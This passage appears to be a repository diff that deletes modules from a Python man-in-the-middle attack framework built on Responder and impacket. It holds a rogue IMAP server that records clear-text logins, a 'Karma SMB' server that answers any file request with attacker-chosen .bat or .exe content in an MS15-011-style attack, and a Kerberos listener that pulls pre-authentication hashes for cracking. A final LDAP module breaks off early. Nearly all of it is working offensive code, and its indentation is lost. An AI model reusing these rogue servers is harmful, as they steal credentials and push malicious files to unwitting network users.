from SocketServer import BaseRequestHandler, ThreadingMixIn, TCPServer
from core.responder.packets import IMAPGreeting, IMAPCapability, IMAPCapabilityEnd
class IMAP:
def start(self):
try:
if OsInterfaceIsSupported():
server = ThreadingTCPServer((settings.Config.Bind_To, 143), IMAP4)
else:
server = ThreadingTCPServer(('', 143), IMAP4)
t = threading.Thread(name='IMAP', target=server.serve_forever)
t.setDaemon(True)
t.start()
except Exception as e:
print "Error starting IMAP server: {}".format(e)
print_exc()
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
allow_reuse_address = 1
def server_bind(self):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
TCPServer.server_bind(self)
# IMAP4 Server class
class IMAP4(BaseRequestHandler):
def handle(self):
try:
self.request.send(str(IMAPGreeting()))
data = self.request.recv(1024)
if data[5:15] == "CAPABILITY":
RequestTag = data[0:4]
self.request.send(str(IMAPCapability()))
self.request.send(str(IMAPCapabilityEnd(Tag=RequestTag)))
data = self.request.recv(1024)
if data[5:10] == "LOGIN":
Credentials = data[10:].strip()
SaveToDb({
'module': 'IMAP',
'type': 'Cleartext',
'client': self.client_address[0],
'user': Credentials[0],
'cleartext': Credentials[1],
'fullhash': Credentials[0]+":"+Credentials[1],
})
## FIXME: Close connection properly
## self.request.send(str(ditchthisconnection()))
## data = self.request.recv(1024)
except Exception:
pass

View file

@ -1,579 +0,0 @@
#!/usr/bin/python
# Copyright (c) 2015 CORE Security Technologies
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Karma SMB
#
# Author:
# Alberto Solino (@agsolino)
# Original idea by @mubix
#
# Description:
# The idea of this script is to answer any file read request
# with a set of predefined contents based on the extension
# asked, regardless of the sharename and/or path.
# When executing this script w/o a config file the pathname
# file contents will be sent for every request.
# If a config file is specified, format should be this way:
# <extension> = <pathname>
# for example:
# bat = /tmp/batchfile
# com = /tmp/comfile
# exe = /tmp/exefile
#
# The SMB2 support works with a caveat. If two different
# filenames at the same share are requested, the first
# one will work and the second one will not work if the request
# is performed right away. This seems related to the
# QUERY_DIRECTORY request, where we return the files available.
# In the first try, we return the file that was asked to open.
# In the second try, the client will NOT ask for another
# QUERY_DIRECTORY but will use the cached one. This time the new file
# is not there, so the client assumes it doesn't exist.
# After a few seconds, looks like the client cache is cleared and
# the operation works again. Further research is needed trying
# to avoid this from happening.
#
# SMB1 seems to be working fine on that scenario.
#
# ToDo:
# [ ] A lot of testing needed under different OSes.
# I'm still not sure how reliable this approach is.
# [ ] Add support for other SMB read commands. Right now just
# covering SMB_COM_NT_CREATE_ANDX
# [ ] Disable write request, now if the client tries to copy
# a file back to us, it will overwrite the files we're
# hosting. *CAREFUL!!!*
#
import sys
import os
import argparse
import logging
import ntpath
import ConfigParser
from threading import Thread
from mitmflib.impacket.examples import logger
from mitmflib.impacket import smbserver, smb, version
import mitmflib.impacket.smb3structs as smb2
from mitmflib.impacket.smb import FILE_OVERWRITE, FILE_OVERWRITE_IF, FILE_WRITE_DATA, FILE_APPEND_DATA, GENERIC_WRITE
from mitmflib.impacket.nt_errors import STATUS_USER_SESSION_DELETED, STATUS_SUCCESS, STATUS_ACCESS_DENIED, STATUS_NO_MORE_FILES, \
STATUS_OBJECT_PATH_NOT_FOUND
from mitmflib.impacket.smbserver import SRVSServer, decodeSMBString, findFirst2, STATUS_SMB_BAD_TID, encodeSMBString, \
getFileTime, queryPathInformation
class KarmaSMBServer(Thread):
def __init__(self, smb_challenge, smb_port, smb2Support = False):
Thread.__init__(self)
self.server = 0
self.defaultFile = None
self.extensions = {}
# Here we write a mini config for the server
smbConfig = ConfigParser.ConfigParser()
smbConfig.add_section('global')
smbConfig.set('global','server_name','server_name')
smbConfig.set('global','server_os','UNIX')
smbConfig.set('global','server_domain','WORKGROUP')
smbConfig.set('global', 'challenge', smb_challenge.decode('hex'))
smbConfig.set('global','log_file','smb.log')
smbConfig.set('global','credentials_file','')
# IPC always needed
smbConfig.add_section('IPC$')
smbConfig.set('IPC$','comment','Logon server share')
smbConfig.set('IPC$','read only','yes')
smbConfig.set('IPC$','share type','3')
smbConfig.set('IPC$','path','')
# NETLOGON always needed
smbConfig.add_section('NETLOGON')
smbConfig.set('NETLOGON','comment','Logon server share')
smbConfig.set('NETLOGON','read only','no')
smbConfig.set('NETLOGON','share type','0')
smbConfig.set('NETLOGON','path','')
# SYSVOL always needed
smbConfig.add_section('SYSVOL')
smbConfig.set('SYSVOL','comment','')
smbConfig.set('SYSVOL','read only','no')
smbConfig.set('SYSVOL','share type','0')
smbConfig.set('SYSVOL','path','')
if smb2Support:
smbConfig.set("global", "SMB2Support", "True")
self.server = smbserver.SMBSERVER(('0.0.0.0', int(smb_port)), config_parser = smbConfig)
self.server.processConfigFile()
# Unregistering some dangerous and unwanted commands
self.server.unregisterSmbCommand(smb.SMB.SMB_COM_CREATE_DIRECTORY)
self.server.unregisterSmbCommand(smb.SMB.SMB_COM_DELETE_DIRECTORY)
self.server.unregisterSmbCommand(smb.SMB.SMB_COM_RENAME)
self.server.unregisterSmbCommand(smb.SMB.SMB_COM_DELETE)
self.server.unregisterSmbCommand(smb.SMB.SMB_COM_WRITE)
self.server.unregisterSmbCommand(smb.SMB.SMB_COM_WRITE_ANDX)
self.server.unregisterSmb2Command(smb2.SMB2_WRITE)
self.origsmbComNtCreateAndX = self.server.hookSmbCommand(smb.SMB.SMB_COM_NT_CREATE_ANDX, self.smbComNtCreateAndX)
self.origsmbComTreeConnectAndX = self.server.hookSmbCommand(smb.SMB.SMB_COM_TREE_CONNECT_ANDX, self.smbComTreeConnectAndX)
self.origQueryPathInformation = self.server.hookTransaction2(smb.SMB.TRANS2_QUERY_PATH_INFORMATION, self.queryPathInformation)
self.origFindFirst2 = self.server.hookTransaction2(smb.SMB.TRANS2_FIND_FIRST2, self.findFirst2)
# And the same for SMB2
self.origsmb2TreeConnect = self.server.hookSmb2Command(smb2.SMB2_TREE_CONNECT, self.smb2TreeConnect)
self.origsmb2Create = self.server.hookSmb2Command(smb2.SMB2_CREATE, self.smb2Create)
self.origsmb2QueryDirectory = self.server.hookSmb2Command(smb2.SMB2_QUERY_DIRECTORY, self.smb2QueryDirectory)
self.origsmb2Read = self.server.hookSmb2Command(smb2.SMB2_READ, self.smb2Read)
self.origsmb2Close = self.server.hookSmb2Command(smb2.SMB2_CLOSE, self.smb2Close)
# Now we have to register the MS-SRVS server. This specially important for
# Windows 7+ and Mavericks clients since they WONT (specially OSX)
# ask for shares using MS-RAP.
self.__srvsServer = SRVSServer()
self.__srvsServer.daemon = True
self.server.registerNamedPipe('srvsvc',('127.0.0.1',self.__srvsServer.getListenPort()))
def findFirst2(self, connId, smbServer, recvPacket, parameters, data, maxDataCount):
connData = smbServer.getConnectionData(connId)
respSetup = ''
respParameters = ''
respData = ''
findFirst2Parameters = smb.SMBFindFirst2_Parameters( recvPacket['Flags2'], data = parameters)
# 1. Let's grab the extension and map the file's contents we will deliver
origPathName = os.path.normpath(decodeSMBString(recvPacket['Flags2'],findFirst2Parameters['FileName']).replace('\\','/'))
origFileName = os.path.basename(origPathName)
_, origPathNameExtension = os.path.splitext(origPathName)
origPathNameExtension = origPathNameExtension.upper()[1:]
if self.extensions.has_key(origPathNameExtension.upper()):
targetFile = self.extensions[origPathNameExtension.upper()]
else:
targetFile = self.defaultFile
if connData['ConnectedShares'].has_key(recvPacket['Tid']):
path = connData['ConnectedShares'][recvPacket['Tid']]['path']
# 2. We call the normal findFirst2 call, but with our targetFile
searchResult, searchCount, errorCode = findFirst2(path,
targetFile,
findFirst2Parameters['InformationLevel'],
findFirst2Parameters['SearchAttributes'] )
respParameters = smb.SMBFindFirst2Response_Parameters()
endOfSearch = 1
sid = 0x80 # default SID
searchCount = 0
totalData = 0
for i in enumerate(searchResult):
#i[1].dump()
try:
# 3. And we restore the original filename requested ;)
i[1]['FileName'] = encodeSMBString( flags = recvPacket['Flags2'], text = origFileName)
except:
pass
data = i[1].getData()
lenData = len(data)
if (totalData+lenData) >= maxDataCount or (i[0]+1) > findFirst2Parameters['SearchCount']:
# We gotta stop here and continue on a find_next2
endOfSearch = 0
# Simple way to generate a fid
if len(connData['SIDs']) == 0:
sid = 1
else:
sid = connData['SIDs'].keys()[-1] + 1
# Store the remaining search results in the ConnData SID
connData['SIDs'][sid] = searchResult[i[0]:]
respParameters['LastNameOffset'] = totalData
break
else:
searchCount +=1
respData += data
totalData += lenData
respParameters['SID'] = sid
respParameters['EndOfSearch'] = endOfSearch
respParameters['SearchCount'] = searchCount
else:
errorCode = STATUS_SMB_BAD_TID
smbServer.setConnectionData(connId, connData)
return respSetup, respParameters, respData, errorCode
def smbComNtCreateAndX(self, connId, smbServer, SMBCommand, recvPacket):
connData = smbServer.getConnectionData(connId)
ntCreateAndXParameters = smb.SMBNtCreateAndX_Parameters(SMBCommand['Parameters'])
ntCreateAndXData = smb.SMBNtCreateAndX_Data( flags = recvPacket['Flags2'], data = SMBCommand['Data'])
respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_NT_CREATE_ANDX)
#ntCreateAndXParameters.dump()
# Let's try to avoid allowing write requests from the client back to us
# not 100% bulletproof, plus also the client might be using other SMB
# calls (e.g. SMB_COM_WRITE)
createOptions = ntCreateAndXParameters['CreateOptions']
if createOptions & smb.FILE_DELETE_ON_CLOSE == smb.FILE_DELETE_ON_CLOSE:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateAndXParameters['Disposition'] & smb.FILE_OVERWRITE == FILE_OVERWRITE:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateAndXParameters['Disposition'] & smb.FILE_OVERWRITE_IF == FILE_OVERWRITE_IF:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateAndXParameters['AccessMask'] & smb.FILE_WRITE_DATA == FILE_WRITE_DATA:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateAndXParameters['AccessMask'] & smb.FILE_APPEND_DATA == FILE_APPEND_DATA:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateAndXParameters['AccessMask'] & smb.GENERIC_WRITE == GENERIC_WRITE:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateAndXParameters['AccessMask'] & 0x10000 == 0x10000:
errorCode = STATUS_ACCESS_DENIED
else:
errorCode = STATUS_SUCCESS
if errorCode == STATUS_ACCESS_DENIED:
return [respSMBCommand], None, errorCode
# 1. Let's grab the extension and map the file's contents we will deliver
origPathName = os.path.normpath(decodeSMBString(recvPacket['Flags2'],ntCreateAndXData['FileName']).replace('\\','/'))
_, origPathNameExtension = os.path.splitext(origPathName)
origPathNameExtension = origPathNameExtension.upper()[1:]
if self.extensions.has_key(origPathNameExtension.upper()):
targetFile = self.extensions[origPathNameExtension.upper()]
else:
targetFile = self.defaultFile
# 2. We change the filename in the request for our targetFile
ntCreateAndXData['FileName'] = encodeSMBString( flags = recvPacket['Flags2'], text = targetFile)
SMBCommand['Data'] = str(ntCreateAndXData)
smbServer.log("%s is asking for %s. Delivering %s" % (connData['ClientIP'], origPathName,targetFile),logging.INFO)
# 3. We call the original call with our modified data
return self.origsmbComNtCreateAndX(connId, smbServer, SMBCommand, recvPacket)
def queryPathInformation(self, connId, smbServer, recvPacket, parameters, data, maxDataCount = 0):
# The trick we play here is that Windows clients first ask for the file
# and then it asks for the directory containing the file.
# It is important to answer the right questions for the attack to work
connData = smbServer.getConnectionData(connId)
respSetup = ''
respParameters = ''
respData = ''
errorCode = 0
queryPathInfoParameters = smb.SMBQueryPathInformation_Parameters(flags = recvPacket['Flags2'], data = parameters)
if connData['ConnectedShares'].has_key(recvPacket['Tid']):
path = ''
try:
origPathName = decodeSMBString(recvPacket['Flags2'], queryPathInfoParameters['FileName'])
origPathName = os.path.normpath(origPathName.replace('\\','/'))
if connData.has_key('MS15011') is False:
connData['MS15011'] = {}
smbServer.log("Client is asking for QueryPathInformation for: %s" % origPathName,logging.INFO)
if connData['MS15011'].has_key(origPathName) or origPathName == '.':
# We already processed this entry, now it's asking for a directory
infoRecord, errorCode = queryPathInformation(path, '/', queryPathInfoParameters['InformationLevel'])
else:
# First time asked, asking for the file
infoRecord, errorCode = queryPathInformation(path, self.defaultFile, queryPathInfoParameters['InformationLevel'])
connData['MS15011'][os.path.dirname(origPathName)] = infoRecord
except Exception, e:
#import traceback
#traceback.print_exc()
smbServer.log("queryPathInformation: %s" % e,logging.ERROR)
if infoRecord is not None:
respParameters = smb.SMBQueryPathInformationResponse_Parameters()
respData = infoRecord
else:
errorCode = STATUS_SMB_BAD_TID
smbServer.setConnectionData(connId, connData)
return respSetup, respParameters, respData, errorCode
def smb2Read(self, connId, smbServer, recvPacket):
connData = smbServer.getConnectionData(connId)
connData['MS15011']['StopConnection'] = True
smbServer.setConnectionData(connId, connData)
return self.origsmb2Read(connId, smbServer, recvPacket)
def smb2Close(self, connId, smbServer, recvPacket):
connData = smbServer.getConnectionData(connId)
# We're closing the connection trying to flush the client's
# cache.
if connData['MS15011']['StopConnection'] is True:
return [smb2.SMB2Error()], None, STATUS_USER_SESSION_DELETED
return self.origsmb2Close(connId, smbServer, recvPacket)
def smb2Create(self, connId, smbServer, recvPacket):
connData = smbServer.getConnectionData(connId)
ntCreateRequest = smb2.SMB2Create(recvPacket['Data'])
# Let's try to avoid allowing write requests from the client back to us
# not 100% bulletproof, plus also the client might be using other SMB
# calls
createOptions = ntCreateRequest['CreateOptions']
if createOptions & smb2.FILE_DELETE_ON_CLOSE == smb2.FILE_DELETE_ON_CLOSE:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateRequest['CreateDisposition'] & smb2.FILE_OVERWRITE == smb2.FILE_OVERWRITE:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateRequest['CreateDisposition'] & smb2.FILE_OVERWRITE_IF == smb2.FILE_OVERWRITE_IF:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateRequest['DesiredAccess'] & smb2.FILE_WRITE_DATA == smb2.FILE_WRITE_DATA:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateRequest['DesiredAccess'] & smb2.FILE_APPEND_DATA == smb2.FILE_APPEND_DATA:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateRequest['DesiredAccess'] & smb2.GENERIC_WRITE == smb2.GENERIC_WRITE:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateRequest['DesiredAccess'] & 0x10000 == 0x10000:
errorCode = STATUS_ACCESS_DENIED
else:
errorCode = STATUS_SUCCESS
if errorCode == STATUS_ACCESS_DENIED:
return [smb2.SMB2Error()], None, errorCode
# 1. Let's grab the extension and map the file's contents we will deliver
origPathName = os.path.normpath(ntCreateRequest['Buffer'][:ntCreateRequest['NameLength']].decode('utf-16le').replace('\\','/'))
_, origPathNameExtension = os.path.splitext(origPathName)
origPathNameExtension = origPathNameExtension.upper()[1:]
# Are we being asked for a directory?
if (createOptions & smb2.FILE_DIRECTORY_FILE) == 0:
if self.extensions.has_key(origPathNameExtension.upper()):
targetFile = self.extensions[origPathNameExtension.upper()]
else:
targetFile = self.defaultFile
connData['MS15011']['FileData'] = (os.path.basename(origPathName), targetFile)
smbServer.log("%s is asking for %s. Delivering %s" % (connData['ClientIP'], origPathName,targetFile),logging.INFO)
else:
targetFile = '/'
# 2. We change the filename in the request for our targetFile
ntCreateRequest['Buffer'] = targetFile.encode('utf-16le')
ntCreateRequest['NameLength'] = len(targetFile)*2
recvPacket['Data'] = str(ntCreateRequest)
# 3. We call the original call with our modified data
return self.origsmb2Create(connId, smbServer, recvPacket)
def smb2QueryDirectory(self, connId, smbServer, recvPacket):
# Windows clients with SMB2 will also perform a QueryDirectory
# expecting to get the filename asked. So we deliver it :)
connData = smbServer.getConnectionData(connId)
respSMBCommand = smb2.SMB2QueryDirectory_Response()
#queryDirectoryRequest = smb2.SMB2QueryDirectory(recvPacket['Data'])
errorCode = 0xff
respSMBCommand['Buffer'] = '\x00'
errorCode = STATUS_SUCCESS
#if (queryDirectoryRequest['Flags'] & smb2.SL_RETURN_SINGLE_ENTRY) == 0:
# return [smb2.SMB2Error()], None, STATUS_NOT_SUPPORTED
if connData['MS15011']['FindDone'] is True:
connData['MS15011']['FindDone'] = False
smbServer.setConnectionData(connId, connData)
return [smb2.SMB2Error()], None, STATUS_NO_MORE_FILES
else:
origName, targetFile = connData['MS15011']['FileData']
(mode, ino, dev, nlink, uid, gid, size, atime, mtime, ctime) = os.stat(targetFile)
infoRecord = smb.SMBFindFileIdBothDirectoryInfo( smb.SMB.FLAGS2_UNICODE )
infoRecord['ExtFileAttributes'] = smb.ATTR_NORMAL | smb.ATTR_ARCHIVE
infoRecord['EaSize'] = 0
infoRecord['EndOfFile'] = size
infoRecord['AllocationSize'] = size
infoRecord['CreationTime'] = getFileTime(ctime)
infoRecord['LastAccessTime'] = getFileTime(atime)
infoRecord['LastWriteTime'] = getFileTime(mtime)
infoRecord['LastChangeTime'] = getFileTime(mtime)
infoRecord['ShortName'] = '\x00'*24
#infoRecord['FileName'] = os.path.basename(origName).encode('utf-16le')
infoRecord['FileName'] = origName.encode('utf-16le')
padLen = (8-(len(infoRecord) % 8)) % 8
infoRecord['NextEntryOffset'] = 0
respSMBCommand['OutputBufferOffset'] = 0x48
respSMBCommand['OutputBufferLength'] = len(infoRecord.getData())
respSMBCommand['Buffer'] = infoRecord.getData() + '\xaa'*padLen
connData['MS15011']['FindDone'] = True
smbServer.setConnectionData(connId, connData)
return [respSMBCommand], None, errorCode
def smb2TreeConnect(self, connId, smbServer, recvPacket):
connData = smbServer.getConnectionData(connId)
respPacket = smb2.SMB2Packet()
respPacket['Flags'] = smb2.SMB2_FLAGS_SERVER_TO_REDIR
respPacket['Status'] = STATUS_SUCCESS
respPacket['CreditRequestResponse'] = 1
respPacket['Command'] = recvPacket['Command']
respPacket['SessionID'] = connData['Uid']
respPacket['Reserved'] = recvPacket['Reserved']
respPacket['MessageID'] = recvPacket['MessageID']
respPacket['TreeID'] = recvPacket['TreeID']
respSMBCommand = smb2.SMB2TreeConnect_Response()
treeConnectRequest = smb2.SMB2TreeConnect(recvPacket['Data'])
errorCode = STATUS_SUCCESS
## Process here the request, does the share exist?
path = str(recvPacket)[treeConnectRequest['PathOffset']:][:treeConnectRequest['PathLength']]
UNCOrShare = path.decode('utf-16le')
# Is this a UNC?
if ntpath.ismount(UNCOrShare):
path = UNCOrShare.split('\\')[3]
else:
path = ntpath.basename(UNCOrShare)
# We won't search for the share.. all of them exist :P
#share = searchShare(connId, path.upper(), smbServer)
connData['MS15011'] = {}
connData['MS15011']['FindDone'] = False
connData['MS15011']['StopConnection'] = False
share = {}
if share is not None:
# Simple way to generate a Tid
if len(connData['ConnectedShares']) == 0:
tid = 1
else:
tid = connData['ConnectedShares'].keys()[-1] + 1
connData['ConnectedShares'][tid] = share
connData['ConnectedShares'][tid]['path'] = '/'
connData['ConnectedShares'][tid]['shareName'] = path
respPacket['TreeID'] = tid
#smbServer.log("Connecting Share(%d:%s)" % (tid,path))
else:
smbServer.log("SMB2_TREE_CONNECT not found %s" % path, logging.ERROR)
errorCode = STATUS_OBJECT_PATH_NOT_FOUND
respPacket['Status'] = errorCode
##
if path == 'IPC$':
respSMBCommand['ShareType'] = smb2.SMB2_SHARE_TYPE_PIPE
respSMBCommand['ShareFlags'] = 0x30
else:
respSMBCommand['ShareType'] = smb2.SMB2_SHARE_TYPE_DISK
respSMBCommand['ShareFlags'] = 0x0
respSMBCommand['Capabilities'] = 0
respSMBCommand['MaximalAccess'] = 0x011f01ff
respPacket['Data'] = respSMBCommand
smbServer.setConnectionData(connId, connData)
return None, [respPacket], errorCode
def smbComTreeConnectAndX(self, connId, smbServer, SMBCommand, recvPacket):
connData = smbServer.getConnectionData(connId)
resp = smb.NewSMBPacket()
resp['Flags1'] = smb.SMB.FLAGS1_REPLY
resp['Flags2'] = smb.SMB.FLAGS2_EXTENDED_SECURITY | smb.SMB.FLAGS2_NT_STATUS | smb.SMB.FLAGS2_LONG_NAMES | recvPacket['Flags2'] & smb.SMB.FLAGS2_UNICODE
resp['Tid'] = recvPacket['Tid']
resp['Mid'] = recvPacket['Mid']
resp['Pid'] = connData['Pid']
respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_TREE_CONNECT_ANDX)
respParameters = smb.SMBTreeConnectAndXResponse_Parameters()
respData = smb.SMBTreeConnectAndXResponse_Data()
treeConnectAndXParameters = smb.SMBTreeConnectAndX_Parameters(SMBCommand['Parameters'])
if treeConnectAndXParameters['Flags'] & 0x8:
respParameters = smb.SMBTreeConnectAndXExtendedResponse_Parameters()
treeConnectAndXData = smb.SMBTreeConnectAndX_Data( flags = recvPacket['Flags2'] )
treeConnectAndXData['_PasswordLength'] = treeConnectAndXParameters['PasswordLength']
treeConnectAndXData.fromString(SMBCommand['Data'])
errorCode = STATUS_SUCCESS
UNCOrShare = decodeSMBString(recvPacket['Flags2'], treeConnectAndXData['Path'])
# Is this a UNC?
if ntpath.ismount(UNCOrShare):
path = UNCOrShare.split('\\')[3]
else:
path = ntpath.basename(UNCOrShare)
# We won't search for the share.. all of them exist :P
smbServer.log("TreeConnectAndX request for %s" % path, logging.INFO)
#share = searchShare(connId, path, smbServer)
share = {}
# Simple way to generate a Tid
if len(connData['ConnectedShares']) == 0:
tid = 1
else:
tid = connData['ConnectedShares'].keys()[-1] + 1
connData['ConnectedShares'][tid] = share
connData['ConnectedShares'][tid]['path'] = '/'
connData['ConnectedShares'][tid]['shareName'] = path
resp['Tid'] = tid
#smbServer.log("Connecting Share(%d:%s)" % (tid,path))
respParameters['OptionalSupport'] = smb.SMB.SMB_SUPPORT_SEARCH_BITS
if path == 'IPC$':
respData['Service'] = 'IPC'
else:
respData['Service'] = path
respData['PadLen'] = 0
respData['NativeFileSystem'] = encodeSMBString(recvPacket['Flags2'], 'NTFS' )
respSMBCommand['Parameters'] = respParameters
respSMBCommand['Data'] = respData
resp['Uid'] = connData['Uid']
resp.addCommand(respSMBCommand)
smbServer.setConnectionData(connId, connData)
return None, [resp], errorCode
def start(self):
self.server.serve_forever()
def setDefaultFile(self, filename):
self.defaultFile = filename
def setExtensionsConfig(self, filename):
for line in filename.readlines():
line = line.strip('\r\n ')
if line.startswith('#') is not True and len(line) > 0:
extension, pathName = line.split('=')
self.extensions[extension.strip().upper()] = os.path.normpath(pathName.strip())

View file

@ -1,204 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import struct
import core.responder.settings as settings
import threading
from traceback import print_exc
from SocketServer import BaseRequestHandler, ThreadingMixIn, TCPServer, UDPServer
from core.responder.utils import *
class Kerberos:
def start(self):
try:
if OsInterfaceIsSupported():
server1 = ThreadingTCPServer((settings.Config.Bind_To, 88), KerbTCP)
server2 = ThreadingUDPServer((settings.Config.Bind_To, 88), KerbUDP)
else:
server1 = ThreadingTCPServer(('', 88), KerbTCP)
server2 = ThreadingUDPServer(('', 88), KerbUDP)
for server in [server1, server2]:
t = threading.Thread(name='Kerberos', target=server.serve_forever)
t.setDaemon(True)
t.start()
except Exception as e:
print "Error starting Kerberos server: {}".format(e)
print_exc()
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
allow_reuse_address = 1
def server_bind(self):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
TCPServer.server_bind(self)
class ThreadingUDPServer(ThreadingMixIn, UDPServer):
allow_reuse_address = 1
def server_bind(self):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
UDPServer.server_bind(self)
def ParseMSKerbv5TCP(Data):
MsgType = Data[21:22]
EncType = Data[43:44]
MessageType = Data[32:33]
if MsgType == "\x0a" and EncType == "\x17" and MessageType =="\x02":
if Data[49:53] == "\xa2\x36\x04\x34" or Data[49:53] == "\xa2\x35\x04\x33":
HashLen = struct.unpack('<b',Data[50:51])[0]
if HashLen == 54:
Hash = Data[53:105]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[153:154])[0]
Name = Data[154:154+NameLen]
DomainLen = struct.unpack('<b',Data[154+NameLen+3:154+NameLen+4])[0]
Domain = Data[154+NameLen+4:154+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return BuildHash
if Data[44:48] == "\xa2\x36\x04\x34" or Data[44:48] == "\xa2\x35\x04\x33":
HashLen = struct.unpack('<b',Data[45:46])[0]
if HashLen == 53:
Hash = Data[48:99]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[147:148])[0]
Name = Data[148:148+NameLen]
DomainLen = struct.unpack('<b',Data[148+NameLen+3:148+NameLen+4])[0]
Domain = Data[148+NameLen+4:148+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return BuildHash
if HashLen == 54:
Hash = Data[53:105]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[148:149])[0]
Name = Data[149:149+NameLen]
DomainLen = struct.unpack('<b',Data[149+NameLen+3:149+NameLen+4])[0]
Domain = Data[149+NameLen+4:149+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return BuildHash
else:
Hash = Data[48:100]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[148:149])[0]
Name = Data[149:149+NameLen]
DomainLen = struct.unpack('<b',Data[149+NameLen+3:149+NameLen+4])[0]
Domain = Data[149+NameLen+4:149+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return BuildHash
else:
return False
def ParseMSKerbv5UDP(Data):
MsgType = Data[17:18]
EncType = Data[39:40]
if MsgType == "\x0a" and EncType == "\x17":
if Data[40:44] == "\xa2\x36\x04\x34" or Data[40:44] == "\xa2\x35\x04\x33":
HashLen = struct.unpack('<b',Data[41:42])[0]
if HashLen == 54:
Hash = Data[44:96]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[144:145])[0]
Name = Data[145:145+NameLen]
DomainLen = struct.unpack('<b',Data[145+NameLen+3:145+NameLen+4])[0]
Domain = Data[145+NameLen+4:145+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return BuildHash
if HashLen == 53:
Hash = Data[44:95]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[143:144])[0]
Name = Data[144:144+NameLen]
DomainLen = struct.unpack('<b',Data[144+NameLen+3:144+NameLen+4])[0]
Domain = Data[144+NameLen+4:144+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return BuildHash
else:
Hash = Data[49:101]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[149:150])[0]
Name = Data[150:150+NameLen]
DomainLen = struct.unpack('<b',Data[150+NameLen+3:150+NameLen+4])[0]
Domain = Data[150+NameLen+4:150+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return BuildHash
else:
return False
class KerbTCP(BaseRequestHandler):
def handle(self):
try:
data = self.request.recv(1024)
KerbHash = ParseMSKerbv5TCP(data)
if KerbHash:
(n, krb, v, name, domain, d, h) = KerbHash.split('$')
SaveToDb({
'module': 'KERB',
'type': 'MSKerbv5',
'client': self.client_address[0],
'user': domain+'\\'+name,
'hash': h,
'fullhash': KerbHash,
})
except Exception:
raise
class KerbUDP(BaseRequestHandler):
def handle(self):
try:
data, soc = self.request
KerbHash = ParseMSKerbv5UDP(data)
if KerbHash:
(n, krb, v, name, domain, d, h) = KerbHash.split('$')
SaveToDb({
'module': 'KERB',
'type': 'MSKerbv5',
'client': self.client_address[0],
'user': domain+'\\'+name,
'hash': h,
'fullhash': KerbHash,
})
except Exception:
raise

View file

@ -1,167 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import struct
import core.responder.settings as settings
import threading
from traceback import print_exc
from SocketServer import BaseRequestHandler, ThreadingMixIn, TCPServer
from core.responder.packets import LDAPSearchDefaultPacket, LDAPSearchSupportedCapabilitiesPacket, LDAPSearchSupportedMechanismsPacket, LDAPNTLMChallenge
from core.responder.utils import *
class LDAP:
def start(self):
try:
if OsInterfaceIsSupported():
server = ThreadingTCPServer((settings.Config.Bind_To, 389), LDAPServer)
else:
